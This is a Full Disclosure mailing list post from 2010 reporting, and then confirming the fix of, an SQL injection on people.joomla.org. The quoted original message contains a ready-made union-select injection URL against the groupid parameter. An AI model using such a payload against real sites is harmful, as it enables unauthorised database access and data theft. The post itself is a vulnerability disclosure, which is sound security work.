Full Disclosure mailing list archives
Re: [0day?] sql-injection in people.joomla.org
From: "Zerial." <fernando () zerial org>
Date: Wed, 29 Dec 2010 11:40:25 -0300
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 has been fixed On 12/28/10 14:31, Zerial. wrote:
Hi folks, Exists an SQL-Injection on http://people.joomla.org http://people.joomla.org/events.html?groupid=1%20or%201=0%20union%20select%20all%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70;%20-- I hope which affect to any site that use this plugin, extension or module too. more info: http://blog.zerial.org/seguridad/0-day-sql-injection-en-sitio-web-de-joomla/ cheers,
- -- Zerial Seguridad Informatica GNU/Linux User #382319 Blog: http://blog.zerial.org Jabber: zerial () jabberes org -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.11 (GNU/Linux) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/ iEYEARECAAYFAk0bSFkACgkQIP17Kywx9JTMXwCdGF6KM8/muzxKldrIlQhRsSAq FFwAni+CFh3q7XrnbvUCX/DXkJWbXb3X =QByI -----END PGP SIGNATURE----- _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Current thread:
- [0day?] sql-injection in people.joomla.org Zerial. (Dec 28)
- Re: [0day?] sql-injection in people.joomla.org Zerial. (Dec 29)